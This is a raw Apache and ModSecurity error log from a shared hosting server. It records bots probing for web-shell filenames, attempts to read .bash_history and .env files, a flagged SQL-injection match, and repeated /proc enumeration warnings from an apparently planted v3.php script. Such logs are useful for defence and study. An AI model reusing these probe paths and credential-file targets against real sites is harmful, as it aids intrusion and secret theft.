PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174135/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174135/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174135/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174135/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174135/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174135/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:13:35.571692 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-includes/class-wp-http-client.php
[Tue May 12 05:13:35.728938 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/tools.php
[Tue May 12 05:13:36.075186 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/room.php
[Tue May 12 05:13:36.390657 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/file.php
[Tue May 12 05:13:36.894971 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/lv.php
[Tue May 12 05:13:37.545356 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/sim.php
[Tue May 12 05:13:37.702559 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/zezrtidups.php
[Tue May 12 05:13:37.859678 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-includes/class-snoopy.php
[Tue May 12 05:13:38.209916 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/gel4y.php
[Tue May 12 05:13:38.367358 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-cli.php
[Tue May 12 05:13:38.524740 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/xwpg.php
[Tue May 12 05:13:38.682012 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-content/uploads/wp-login.php
[Tue May 12 05:13:38.839594 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/disoxrmons.php
[Tue May 12 05:13:39.313213 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/xmrlpc.php
[Tue May 12 05:13:39.786102 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/sadcut1.php
[Tue May 12 05:13:40.101466 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-content/wsoyanz.php
[Tue May 12 05:13:40.273304 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/hello.php
[Tue May 12 05:14:08.150459 2026] [security2:error] [pid 1825179:tid 1825203] [client 43.166.128.187:34366] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agKbANr1yOh9TvizeziaXAAAAEU"]
PHP Warning:  filesize(): stat failed for /proc/42/task/42/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/42/task/42/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/42/task/42/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/42/task/42/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/42/task/42/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/42/task/42/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704983/task/1704983/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704983/task/1704983/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704983/task/1704983/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704983/task/1704983/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704983/task/1704983/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704983/task/1704983/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:15:32.503086 2026] [autoindex:error] [pid 1820198:tid 1820219] [client 134.122.44.123:52002] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:15:32.715778 2026] [security2:error] [pid 1825179:tid 1825207] [client 216.73.216.110:7653] ModSecurity: Warning. Matched phrase ".bash_history" at ARGS:rights. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_history found within ARGS:rights: .bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKbVNr1yOh9Tvizezia6gAAAEk"]
[Tue May 12 05:15:32.716513 2026] [security2:error] [pid 1825179:tid 1825207] [client 216.73.216.110:7653] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKbVNr1yOh9Tvizezia6gAAAEk"]
[Tue May 12 05:15:32.802486 2026] [security2:error] [pid 1825179:tid 1825207] [client 216.73.216.110:7653] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKbVNr1yOh9Tvizezia6gAAAEk"]
[Tue May 12 05:15:34.880425 2026] [:error] [pid 1825287:tid 1825312] [client 134.122.44.123:52106] File does not exist: /home/totalcloud/public_html/index.php, referer: https://217.113.192.26/
[Tue May 12 05:16:23.572056 2026] [security2:error] [pid 1820198:tid 1820206] [client 119.91.20.139:54142] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKbh81tk6y7yBJLpJo1vwAAAIY"]
[Tue May 12 05:16:26.292670 2026] [security2:error] [pid 1820198:tid 1820213] [client 119.91.20.139:43024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKbis1tk6y7yBJLpJo1wgAAAI0"], referer: http://pole-de-mobilite-regional.com
[Tue May 12 05:18:10.808186 2026] [security2:error] [pid 1825179:tid 1825212] [client 43.166.128.187:53324] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKb8tr1yOh9TvizezicRAAAAE4"]
[Tue May 12 05:18:13.843337 2026] [security2:error] [pid 1842385:tid 1842413] [client 43.166.128.187:47938] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKb9Rs7kySIUZ3ORnIi0wAAARY"], referer: http://www.pole-de-mobilite-regional.com
[Tue May 12 05:18:16.419530 2026] [security2:error] [pid 1820198:tid 1820213] [client 43.166.128.187:50482] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKb-M1tk6y7yBJLpJo2lAAAAI0"], referer: https://www.pole-de-mobilite-regional.com/
PHP Warning:  filesize(): stat failed for /proc/61/task/61/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/61/task/61/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/61/task/61/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/61/task/61/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/61/task/61/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/61/task/61/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:18:45.472224 2026] [security2:error] [pid 1842385:tid 1842410] [client 43.153.215.249:45688] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agKcFRs7kySIUZ3ORnIjAwAAARM"]
[Tue May 12 05:19:24.899966 2026] [security2:error] [pid 1820198:tid 1820208] [client 43.157.170.13:49196] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/badinerie/"] [unique_id "agKcPM1tk6y7yBJLpJo3KAAAAIg"]
[Tue May 12 05:19:28.159747 2026] [security2:error] [pid 1825287:tid 1825311] [client 176.65.139.239:50252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agKcQAgpmE1yW0glLdgrdAAAAMY"]
[Tue May 12 05:19:28.159995 2026] [security2:error] [pid 1825287:tid 1825311] [client 176.65.139.239:50252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agKcQAgpmE1yW0glLdgrdAAAAMY"]
[Tue May 12 05:19:28.160259 2026] [security2:error] [pid 1825287:tid 1825311] [client 176.65.139.239:50252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/app/.env"] [unique_id "agKcQAgpmE1yW0glLdgrdAAAAMY"]
[Tue May 12 05:19:30.005383 2026] [security2:error] [pid 1825287:tid 1825327] [client 170.106.140.110:57422] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKcQggpmE1yW0glLdgrdQAAANU"]
[Tue May 12 05:19:39.648229 2026] [security2:error] [pid 1825179:tid 1825222] [client 114.119.150.22:43619] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: c17f17d58aaf3883c0fb53a5deff5521||1778557779||1778557419"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/mon-compte-2/"] [unique_id "agKcS9r1yOh9TvizezicwAAAAFg"]
[Tue May 12 05:19:39.648429 2026] [security2:error] [pid 1825179:tid 1825222] [client 114.119.150.22:43619] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/mon-compte-2/"] [unique_id "agKcS9r1yOh9TvizezicwAAAAFg"]
[Tue May 12 05:19:40.198707 2026] [security2:error] [pid 1825179:tid 1825222] [client 114.119.150.22:43619] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKcS9r1yOh9TvizezicwAAAAFg"]
[Tue May 12 05:19:45.716623 2026] [security2:error] [pid 1842385:tid 1842391] [client 43.165.167.69:41798] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/comments/feed/"] [unique_id "agKcURs7kySIUZ3ORnIjSgAAAQE"]
PHP Warning:  filesize(): stat failed for /proc/226/task/226/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/226/task/226/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/226/task/226/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/226/task/226/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/226/task/226/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/226/task/226/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:20:06.308446 2026] [security2:error] [pid 1825287:tid 1825304] [client 43.156.116.44:49998] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKcZggpmE1yW0glLdgrpAAAAMA"]
[Tue May 12 05:20:10.138480 2026] [security2:error] [pid 1825179:tid 1825204] [client 43.156.116.44:56548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/"] [unique_id "agKcatr1yOh9Tvizezic4wAAAEY"], referer: https://rentparadise.fr/?post_type=mphb_room_type&p=5536
[Tue May 12 05:20:22.452674 2026] [:error] [pid 1808852:tid 1808875] [client 5.187.35.26:2856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:21:01.975240 2026] [security2:error] [pid 1808852:tid 1808878] [client 49.51.33.159:46460] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agKcnRfeipD4uoG21FouJAAAABc"]
[Tue May 12 05:21:16.245429 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/hhf.php
[Tue May 12 05:21:16.751624 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/amba5.php
[Tue May 12 05:21:17.242715 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/fvvff.php
[Tue May 12 05:21:17.649912 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/about.php
[Tue May 12 05:21:19.080247 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/tfm.php
[Tue May 12 05:21:19.470912 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp-good.php
[Tue May 12 05:21:19.868746 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ioxi-o.php
[Tue May 12 05:21:20.280572 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/edit.php
[Tue May 12 05:21:20.688991 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/inputs.php
[Tue May 12 05:21:21.429899 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/a7.php
[Tue May 12 05:21:21.839260 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ms-edit.php
[Tue May 12 05:21:22.260148 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/insta.php
[Tue May 12 05:21:23.213773 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/t.php
[Tue May 12 05:21:23.608226 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/s.php
[Tue May 12 05:21:23.998494 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/CDX6.php
[Tue May 12 05:21:24.387479 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/100.php
[Tue May 12 05:21:24.813539 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/0x.php
[Tue May 12 05:21:25.220786 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/abc.php
[Tue May 12 05:21:25.621187 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/drykl.php
[Tue May 12 05:21:26.058427 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/term.php
[Tue May 12 05:21:26.455439 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/155.php
[Tue May 12 05:21:27.202830 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/bolt.php
[Tue May 12 05:21:27.894013 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/koiy.php
[Tue May 12 05:21:28.293035 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/amp.php
[Tue May 12 05:21:28.685999 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/solo1.php
[Tue May 12 05:21:29.078630 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/8.php
[Tue May 12 05:21:29.778698 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/jp.php
